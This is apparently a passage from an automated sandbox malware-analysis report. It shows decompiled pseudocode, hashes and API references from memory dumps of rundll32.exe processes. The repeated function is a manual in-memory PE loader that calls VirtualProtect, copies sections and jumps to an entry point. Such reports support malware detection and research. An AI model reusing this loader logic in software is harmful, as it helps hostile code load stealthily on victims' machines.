0x6f026d69
0x6f026d6c
0x6f026d7b
0x6f026d7e
0x6f026d8d
0x6f026d90
0x6f026d9f
0x6f026da2
0x6f026db1
0x6f026db4
0x6f026dc3
0x6f026dc6
0x6f026dd5
0x6f026dd8
0x6f026de7
0x6f026dea
0x6f026ded

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46adfeee2e31e8a2fb9eb683e1d540fd42237feb37f4805f5bd6adba10ca8413
Instruction ID: 79eb590b0da377a89b6e77afd14af32e75c81a5d7fb541df508306a5392d53aa
Opcode Fuzzy Hash: 46adfeee2e31e8a2fb9eb683e1d540fd42237feb37f4805f5bd6adba10ca8413
Instruction Fuzzy Hash: BB1113BDA05A02CFCF68CF06D5949117BF1BB8D320321859AD8094B365D734D855EF54

Uniqueness

Uniqueness Score: -1.00%

Function 6F02BB88, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6F02BB88(intOrPtr* __ecx) {
				void* _t1;
				void* _t2;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E6F02C2C4(__ecx);
				if(_t1 == 0) {
					_t2 = E6F03303C(0xfe338407, 0x77fa1d17);
					if(_t2 != 0) {
						_push( *_t4);
						asm("int3");
						asm("int3");
					}
					 *_t4 = 0;
					return _t2;
				}
				return _t1;
			}

0x6f02bb89
0x6f02bb8b
0x6f02bb92
0x6f02bb9e
0x6f02bba5
0x6f02bba7
0x6f02bba9
0x6f02bbaa
0x6f02bbaa
0x6f02bbab
0x00000000
0x6f02bbab
0x6f02bbb2

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c15a96c7620c44554c4e1fe93e3ccd769cb4049bd096ef4c0d61bc819cc5052
Instruction ID: 245508649b0584043f8bf0d0ac3007f1e879dfd287917d8948f0facf88ee829f
Opcode Fuzzy Hash: 3c15a96c7620c44554c4e1fe93e3ccd769cb4049bd096ef4c0d61bc819cc5052
Instruction Fuzzy Hash: 5ED01276504203E9EF150664EA50F1993E45F42264F71085A9C40675D9CFB6D0524131

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 7080 Parent PID: 6476 rundll32.exeCOMMON

Executed Functions

Function 02792062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02792062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x2794418 = 1;
				asm("movaps xmm0, [0x2793010]");
				asm("movups [0x2794428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E027926BF();
				E027923B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E027926BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E027926BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x2794418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x0279206e
0x0279207c
0x02792083
0x02792086
0x02792090
0x02792097
0x027920a1
0x027920a7
0x027920b0
0x027920b9
0x027920bc
0x027920c2
0x027920c6
0x027920ce
0x027920d5
0x027920d8
0x027920db
0x027920de
0x027920e1
0x027920fb
0x02792101
0x02792104
0x0279210c
0x02792110
0x02792113
0x02792116
0x02792119
0x0279211c
0x02792138
0x02792155
0x0279217a
0x0279217c
0x02792185
0x02792188
0x02792192
0x02792195
0x02792198
0x0279219b
0x0279219e
0x0279236f
0x0279236f
0x027922ce
0x027922d4
0x027921a9
0x027921b7
0x027921bf
0x027921c2
0x027921c4
0x027921ca
0x027921d6
0x027921d9
0x027921dc
0x027921df
0x027923b1
0x027923b1
0x027922ef
0x027922f5
0x027922fb
0x02792301
0x02792307
0x0279230d
0x02792313
0x02792316
0x02792319
0x02792321
0x02792329
0x0279232f
0x02792335
0x0279233b
0x02792341
0x0279234f
0x027922bb
0x027922c1
0x027922c1
0x027922da
0x0279238e
0x02792394
0x027921ea
0x027921ea
0x02792204
0x02792229
0x02792238
0x0279223b
0x0279223f
0x02792243
0x0279224a
0x02792250
0x02792252
0x0279225b
0x0279226c
0x02792272
0x02792278
0x0279227b
0x00000000
0x00000000
0x02792281
0x00000000
0x027921ea
0x027922aa

APIs

VirtualProtect.KERNELBASE ref: 027920E1
VirtualProtect.KERNELBASE ref: 0279217A

Strings

\, xrefs: 02792321

Memory Dump Source

Source File: 00000009.00000002.870368032.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 3db9ddf89f030520c6e7b441143346d791f6d90c8036f1df4a90ea53c622eb38
Instruction ID: 2f8c5817fe361df2775e3f2bd0fb8d77412b813574fcb83df09d7ade57a27466
Opcode Fuzzy Hash: 3db9ddf89f030520c6e7b441143346d791f6d90c8036f1df4a90ea53c622eb38
Instruction Fuzzy Hash: E891ABB4E043189FDB04DFA9D580A9DBBF1BF48314F25846AE958AB352D330A991CF91

Uniqueness

Uniqueness Score: -1.00%

Function 027921EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 02792250

Strings

\, xrefs: 02792321

Memory Dump Source

Source File: 00000009.00000002.870368032.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 1786d1b63ef3a2d6b11770ea26e84b82ed84709718514465d57f86116d480e1f
Instruction ID: ef79be7b0b738546b868e885a6f1a0a41d745dca92229b8f7d6b6de63cbb5e4f
Opcode Fuzzy Hash: 1786d1b63ef3a2d6b11770ea26e84b82ed84709718514465d57f86116d480e1f
Instruction Fuzzy Hash: 1B51CFB5E003298FCB14CF59C980A9DFBF1BF88314F2685A9D958A7312D730A991CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02791E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02791F29

Memory Dump Source

Source File: 00000009.00000002.870368032.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 85a5fbff312cb51ee7e3c152c5c74b3364d96e3f94dbc5cc060f825ed1089f82
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 8541D2B5E0521A9FDB04DFA8D4946AEBBF1FF48310F18852EE848AB340D375A850CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 7088 Parent PID: 6476 rundll32.exeCOMMON

Executed Functions

Function 02A02062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02A02062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x2a04418 = 1;
				asm("movaps xmm0, [0x2a03010]");
				asm("movups [0x2a04428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E02A026BF();
				E02A023B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E02A026BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E02A026BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x2a04418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x02a0206e
0x02a0207c
0x02a02083
0x02a02086
0x02a02090
0x02a02097
0x02a020a1
0x02a020a7
0x02a020b0
0x02a020b9
0x02a020bc
0x02a020c2
0x02a020c6
0x02a020ce
0x02a020d5
0x02a020d8
0x02a020db
0x02a020de
0x02a020e1
0x02a020fb
0x02a02101
0x02a02104
0x02a0210c
0x02a02110
0x02a02113
0x02a02116
0x02a02119
0x02a0211c
0x02a02138
0x02a02155
0x02a0217a
0x02a0217c
0x02a02185
0x02a02188
0x02a02192
0x02a02195
0x02a02198
0x02a0219b
0x02a0219e
0x02a0236f
0x02a0236f
0x02a022ce
0x02a022d4
0x02a021a9
0x02a021b7
0x02a021bf
0x02a021c2
0x02a021c4
0x02a021ca
0x02a021d6
0x02a021d9
0x02a021dc
0x02a021df
0x02a023b1
0x02a023b1
0x02a022ef
0x02a022f5
0x02a022fb
0x02a02301
0x02a02307
0x02a0230d
0x02a02313
0x02a02316
0x02a02319
0x02a02321
0x02a02329
0x02a0232f
0x02a02335
0x02a0233b
0x02a02341
0x02a0234f
0x02a022bb
0x02a022c1
0x02a022c1
0x02a022da
0x02a0238e
0x02a02394
0x02a021ea
0x02a021ea
0x02a02204
0x02a02229
0x02a02238
0x02a0223b
0x02a0223f
0x02a02243
0x02a0224a
0x02a02250
0x02a02252
0x02a0225b
0x02a0226c
0x02a02272
0x02a02278
0x02a0227b
0x00000000
0x00000000
0x02a02281
0x00000000
0x02a021ea
0x02a022aa

APIs

VirtualProtect.KERNELBASE ref: 02A020E1
VirtualProtect.KERNELBASE ref: 02A0217A

Strings

\, xrefs: 02A02321

Memory Dump Source

Source File: 0000000A.00000002.751944661.0000000002A00000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 55bb2d0bf4bfc92dab94dac8044e06c853887d109ad0486463edbb1bcfb353cf
Instruction ID: 6a21ca9731d90a7556f95bad3f3cae679ca5768052081cb2f46ab55959b7e94d
Opcode Fuzzy Hash: 55bb2d0bf4bfc92dab94dac8044e06c853887d109ad0486463edbb1bcfb353cf
Instruction Fuzzy Hash: 78919AB4E043188FDB04CFA9D584A9DFBF1BF88314F25846AE958AB351D730A991CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02A021EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 02A02250

Strings

\, xrefs: 02A02321

Memory Dump Source

Source File: 0000000A.00000002.751944661.0000000002A00000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 295df833cf22fab8d9689822573934fd904a5b52f4e08c6ac82d4c8307c02795
Instruction ID: b3df94d8da5c047a95c1071f778d4f8911e3762db0e0b81c390f93f051a00829
Opcode Fuzzy Hash: 295df833cf22fab8d9689822573934fd904a5b52f4e08c6ac82d4c8307c02795
Instruction Fuzzy Hash: A651ACB5E002298FCB14CF99C980A9DBBF1BF8C314F2585A9D958A7351D730A991CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02A01E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02A01F29

Memory Dump Source

Source File: 0000000A.00000002.751944661.0000000002A00000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 965429cdcf9d3eb8b2426910eb3be7f06b447d9ba1c9193a99389cfe7c754e31
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 0E41D3B1E042198FDB04DFA8D5906AEBBF1FF48314F14856EE848AB340D775A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 7100 Parent PID: 6476 rundll32.exeCOMMON

Executed Functions

Function 028E2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E028E2062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x28e4418 = 1;
				asm("movaps xmm0, [0x28e3010]");
				asm("movups [0x28e4428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E028E26BF();
				E028E23B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E028E26BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E028E26BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x28e4418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x028e206e
0x028e207c
0x028e2083
0x028e2086
0x028e2090
0x028e2097
0x028e20a1
0x028e20a7
0x028e20b0
0x028e20b9
0x028e20bc
0x028e20c2
0x028e20c6
0x028e20ce
0x028e20d5
0x028e20d8
0x028e20db
0x028e20de
0x028e20e1
0x028e20fb
0x028e2101
0x028e2104
0x028e210c
0x028e2110
0x028e2113
0x028e2116
0x028e2119
0x028e211c
0x028e2138
0x028e2155
0x028e217a
0x028e217c
0x028e2185
0x028e2188
0x028e2192
0x028e2195
0x028e2198
0x028e219b
0x028e219e
0x028e236f
0x028e236f
0x028e22ce
0x028e22d4
0x028e21a9
0x028e21b7
0x028e21bf
0x028e21c2
0x028e21c4
0x028e21ca
0x028e21d6
0x028e21d9
0x028e21dc
0x028e21df
0x028e23b1
0x028e23b1
0x028e22ef
0x028e22f5
0x028e22fb
0x028e2301
0x028e2307
0x028e230d
0x028e2313
0x028e2316
0x028e2319
0x028e2321
0x028e2329
0x028e232f
0x028e2335
0x028e233b
0x028e2341
0x028e234f
0x028e22bb
0x028e22c1
0x028e22c1
0x028e22da
0x028e238e
0x028e2394
0x028e21ea
0x028e21ea
0x028e2204
0x028e2229
0x028e2238
0x028e223b
0x028e223f
0x028e2243
0x028e224a
0x028e2250
0x028e2252
0x028e225b
0x028e226c
0x028e2272
0x028e2278
0x028e227b
0x00000000
0x00000000
0x028e2281
0x00000000
0x028e21ea
0x028e22aa

APIs

VirtualProtect.KERNELBASE ref: 028E20E1
VirtualProtect.KERNELBASE ref: 028E217A

Strings

\, xrefs: 028E2321

Memory Dump Source

Source File: 0000000B.00000002.754898280.00000000028E0000.00000040.00000001.sdmp, Offset: 028E0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 79e644734826fefc746f0d3dcd3a898d02378b43c47a999e4869916c0644e560
Instruction ID: ced8307ccdba27ff9bed22d0138b8bf3c03da12c43e44c6f551f18f359cd8998
Opcode Fuzzy Hash: 79e644734826fefc746f0d3dcd3a898d02378b43c47a999e4869916c0644e560
Instruction Fuzzy Hash: 0D91ACB8E042188FDB04DFA9C580A9DFBF1FF48314F15856AE959AB356D330A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 028E21EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 028E2250

Strings

\, xrefs: 028E2321

Memory Dump Source

Source File: 0000000B.00000002.754898280.00000000028E0000.00000040.00000001.sdmp, Offset: 028E0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 063d059d92fc4d087ef4f822509fc71dc0d104d39e6c6c3f30b00a3c798c2b19
Instruction ID: 85daaec665139bd96e7ae67888cd705c614af8c77564c34a0209cc36b9f46021
Opcode Fuzzy Hash: 063d059d92fc4d087ef4f822509fc71dc0d104d39e6c6c3f30b00a3c798c2b19
Instruction Fuzzy Hash: 9451CFB9E002298FCB14CF59C980A9DFBF1BF88314F2585A9D959A7315D730AE91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 028E1E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 028E1F29

Memory Dump Source

Source File: 0000000B.00000002.754898280.00000000028E0000.00000040.00000001.sdmp, Offset: 028E0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 5f090d41a56eecc6923beeead62c7da47d14f1a99dd25c9598ce8ccd3077af5d
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
